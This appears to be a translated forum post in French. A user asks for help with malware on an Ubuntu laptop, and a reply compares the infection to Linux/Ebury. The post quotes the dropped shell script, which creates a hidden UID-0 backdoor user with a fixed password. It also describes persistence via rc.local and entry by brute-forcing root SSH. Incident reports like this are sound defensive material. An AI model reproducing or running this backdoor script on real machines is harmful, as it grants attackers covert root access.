Je suis assez certain que mon ordinateur portable Ubuntu 13.10 est infecté par une sorte de malware.
De temps en temps, je trouve un processus / lib / sshd (appartenant à root) en cours d'exécution et consommant beaucoup de CPU. Ce n'est pas le serveur sshd qui exécute / usr / sbin / sshd.
Le binaire a les autorisations --wxrw-rwt et il génère et génère des scripts dans le répertoire / lib. Un récent est nommé 13959730401387633604 et il fait ce qui suit
#!/bin/sh
exec 1>/dev/null
exec 2>/dev/null
useradd -g 0 -u 0 -o gusr
echo gusr:chaonimabi123456123 | chpasswd
L'utilisateur gusr a été créé indépendamment par le malware, puis le chpasswd se bloque tout en consommant 100% de CPU.
Jusqu'à présent, j'ai identifié que l'utilisateur gusr a été ajouté aux fichiers dans / etc /
/etc/group
/etc/gshadow
/etc/passwd
/etc/shadow
/etc/subgid
/etc/subuid
Il semble que le malware ait fait des copies de tous ces fichiers avec le suffixe "-". La liste complète des fichiers / etc / qui ont été modifiés par root est disponible ici .
De plus, le fichier / etc / hosts a été changé en ceci .
Le / lib / sshd commence par s'ajouter à la fin du fichier /etc/init.d/rc.local!
J'ai supprimé l'utilisateur, supprimé les fichiers, tué l'arborescence des fichiers traités, changé mes mots de passe et supprimé les clés publiques ssh.
Je suis conscient que je suis essentiellement foutu, et je vais probablement réinstaller tout le système. Néanmoins, puisque je me connecte à plusieurs autres machines, il serait bon d'essayer au moins de le supprimer et de comprendre comment je l'ai obtenu. Toute suggestion sur la façon de procéder serait appréciée.
Il semble qu'ils soient entrés le 25 mars en se connectant à la racine avec un forçage brutal. Je n'avais aucune idée que root ssh est activé par défaut dans Ubuntu. Je l'ai désactivé et mis en place des denyhosts.
La connexion était de 59.188.247.236, quelque part à Hong Kong, apparemment.
J'ai obtenu l'ordinateur portable d'EmperorLinux et ils ont activé l'accès root. Si vous en avez un et que vous utilisez sshd, méfiez-vous.
Linux/Ebury
. C'est autre chose, et il est possible qu'aucun nom ne soit attribué. Ebury ne créerait pas de nouveau compte utilisateur et aurait modifié la bibliothèque partagée utilisée par openssh, et non supprimée dans un nouveau binaire nommé sshd.